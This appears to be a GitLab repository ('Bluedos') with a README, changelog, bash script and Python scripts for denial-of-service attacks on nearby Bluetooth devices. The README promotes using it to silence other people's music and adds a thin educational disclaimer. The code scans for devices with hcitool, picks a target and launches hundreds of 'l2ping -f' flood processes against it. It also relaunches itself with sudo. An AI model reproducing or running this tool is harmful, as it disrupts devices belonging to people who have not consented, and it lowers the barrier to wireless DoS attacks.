README.md
# Bluedos

Sometimes we meet with people who like to listen music, and so loud that we, and our ears don't really like it.
Fortunately, if the sound is broadcast on a Bluetooth device, this simple *Python* script can help make music *quieter*.
**;)**


Also you can use it to test your devices for **DoS** attack stability.

## Requirements

- Bluetooth
- Linux
- Python 3.6

## Install

**`python3.6 bluedos.py`**

## Run

**`./bluedos.py`**

## Wiki
Also you can check [Bluedos wiki page](https://gitlab.com/ceigh/bluedos/wikis).

## License

This project is [licensed](https://gitlab.com/ceigh/bluedos/blob/master/LICENSE) under the GNU General Public License v3.0

## Versioning

This project using [Semantic Versioning](https://semver.org)

![logo](https://gitlab.com/ceigh/bluedos/uploads/c644ed417e77eeca460c7f2d15882ba4/logo.png)

*Author does not in any way call for any action, the software is created solely for educational purposes.*


CHANGELOG
* Interface now just module.

* Now to install you just:  `$ python3.6 bluedos.py`
  Next launches:            `$ ./bluedos.py`
  (Auto chmod +x), and now you don't need to sudo typing.

* Bluetooth now enabling automatic.

* Bluetooth statement is saved after script done.

* Optimized


main.sh
#!/usr/bin/env bash

version="0.1"
echo -e "Bluedos v. $version\nDeveloped by @ceigh\n"

echo "Running ..."
#Scanning and get addresses from stdout in str format
hciData=`hcitool scan | awk 'NR>1 {print}'` || echo "Bluetooth error"
echo -e "hciData:\n$hciData" #Control

addresses=`echo $hciData | awk '{print $1}'`
echo -e "\naddresses:\n$addresses" #Control

#Counting addresses number
addressesNumber=`echo $addresses | wc -w`
if [ $addressesNumber -eq 0 ]; then
  echo "There's no devices around"
  exit 0
fi

#If 1 -> attack it, if >1 -> select which addr attack
if [ $addressesNumber -gt 1 ]; then
  names=`echo $hciData | awk '{print $2}'`
  echo "Found $addressesNumber devies, choose:"
  for counter in {1..$addressesNumber}; do
    echo "$counter)" `echo $addresses | awk -v NR=$counter 'NR==$NR'`
  done
else
  echo "ONE"
fi


bluedos.py
#!/usr/bin/env python3.6
#  coding=utf-8
"""Bluedos by @ceigh

Easy Bluetooth devices DOS.
Wiki: gitlab.com/ceigh/bluedos/wikis

"""
import os
import subprocess as sp
from time import sleep

import interface


def bt_switcher(switched_times: list = [0]):
    """
    Check BT off or on and if it's off - up it.
    It calls two times - on startup and before exit - if it was enabled
    before startup, it will remain on after the script finishes. And if
    it was off, it turns off after the script finishes.

    :param switched_times: How many times BT on/off.
    List instead of int because it save statement.

    """
    if (switched_times == [0]) and \
            (not sp.check_output(['hcitool', 'dev'])[9:]):
        os.system("rfkill unblock bluetooth")
        sleep(0.4)
    elif switched_times[0] != 0:
        os.system("rfkill block bluetooth")
    switched_times[0] += 1


def get_devices() -> tuple:
    """
    Using hcitool scans devices around and forms them

    :return: (('00:00:00:00:00:00', 'Dev1'),
              ('11:11:11:11:11:11', 'Dev2'))

    """
    print("\033cScanning, please wait...\n")
    try:
        hcitool_out = sp.check_output(['hcitool', 'scan'])[13:-1]
        devices = tuple([tuple(i.split('\t')[1:])
                         for i in hcitool_out.decode().split('\n')
                         if len(hcitool_out) != 0])
        return devices
    except sp.CalledProcessError:
        exit("Plug bluetooth adapter first.")


def attack(target: tuple):
    """
    Attacks the selected device.
    Creates 750 processes l2ping.

    :param target: tuple with MAC (0) and name of device (1);
                   e.g: ('00:00:00:00:00:00', 'Dev1')

    """
    from signal import SIGTERM
    print(f"\033cTrying on '{target[1]}', please wait...")
    pids = tuple([sp.Popen(['l2ping', '-f', '-s', '660', target[0]],
                           stdout=sp.DEVNULL).pid
                  for p in range(750)])
    try:
        input(f"\033cAttacking '{target[1]}', press enter to stop... ")
    finally:
        [os.kill(pid, SIGTERM) for pid in pids]
        interface.bye()


def main():
    """
    First gets a list of devices, if they are not available, a
    re-scan is suggested. Then, depending on how many devices are
    found: if one is immediately attacked on it; if several - the user
    is asked to choose one of them and the attack is already on him.
    Also if on script launch bluetooth was off - it's blocking after
    job done and if it was working on launch - it still works after
    script done.

    """
    bt_switcher()
    devices = get_devices()
    dev_number = len(devices)
    if not devices:
        print("No devices around :(")
        if not interface.confirm("Scan again?"):
            interface.bye()
        else:
            main()
    elif dev_number == 1:
        attack(devices[0])
    else:
        print(f"\033c{dev_number} devices found:\n")
        [print(f"{index}) <{device[0]}>\t'{device[1]}'")
         for index, device in enumerate(devices)]
        print()
        target_i = None
        while target_i not in range(dev_number):
            try:
                target_i = int(input(f"Select device (0-{dev_number-1}): "))
            except ValueError:
                continue
            except (KeyboardInterrupt, EOFError):
                interface.bye()
                exit(0)
        attack(devices[target_i])
    bt_switcher()
    exit(0)


if __name__ == '__main__':
    if not os.getuid():  # Root launch check
        print(f'\033c{__doc__}')
        sleep(1)
        main()
    from sys import argv

    if not os.access(__file__, os.X_OK):
        os.system(f'sudo chmod +x {argv[0]}')
    os.system(f'sudo ./{argv[0]}')


interface.py
# coding=utf-8
"""Simple interface module.

Simple functions are placed in a separate module
so as not to contaminate the main program.

bye()               Exit from the program.
confirm(question)   Receives an answer to the question.

"""


def bye():
    """Friendly exit from the program."""
    from time import sleep
    print("\nBye!")
    sleep(0.8)
    print('\033c')  # Clear screen


def confirm(question: str) -> bool:
    """Gets the user's response and interprets it in a boolean value.

    :param question: string with '?' at the end (for readability).
    :return: True/False

    """
    try:
        reply = input(f"{question}: ").lower()[:1]
        while True:
            if reply in 'yjsd':  # (yes, ja, si, da); <Enter> also here
                return True
            elif reply == 'n':
                return False
            else:
                reply = input(f"{question} (yjsd/n): ").lower()[:1]
    except (KeyboardInterrupt, EOFError):  # <Ctrl+C>; <Ctrl+D>
        bye()


main.py
# Bluedos by @ceigh
import subprocess


def confirm(question):
    while 1:
        reply = input(f"{question}: ").lower()[:1]
        if reply in 'y':  # 'yosjtdд' (international), using {in} to consider the enter
            return 1
        elif reply == 'n':
            return 0


def bye():
    from time import sleep
    print("\nBye!")
    sleep(1)
    print("\033c")
    exit(0)


def get_devices():
    print("\033c")
    if len(subprocess.check_output(['hcitool', 'dev'])[9:]):
        print("Scanning...\n")
        hcitool_out = subprocess.check_output(['hcitool', 'scan']).decode()[13:-1]
        devices = [i.split('\t')[1:] for i in hcitool_out.split('\n') if len(hcitool_out) != 0]
        return devices
    else:
        exit("Enable bluetooth first")


def attack(target):
    from threading import Thread

    def popen():
        for i in range(10):
            subprocess.Popen(['sudo', 'l2ping', '-f', '-s', '660', target[0]],
                             stderr=subprocess.STDOUT)

    print(f"Attacking '{target[1]}'...\nTo stop type Ctrl+C")
    try:
        for j in range(10):
            Thread(target=popen).start()
    except KeyboardInterrupt:
        bye()


def main():
    devices = get_devices()
    dev_number = len(devices)
    if not dev_number:
        print("No devices around :(")
        if confirm("Scan again?"):
            main()
        else:
            bye()
    elif dev_number == 1:
        attack(devices[0])
    else:
        print("Several devices found:")
        for index, device in enumerate(devices):
            print(f"{index}) '{device[1]}' <{device[0]}>")
        while 1:
            try:
                target_i = int(input(f"Select a device (0-{dev_number - 1}): "))
            except ValueError:
                continue
            if target_i in range(dev_number):
                break
        attack(devices[target_i])


main()
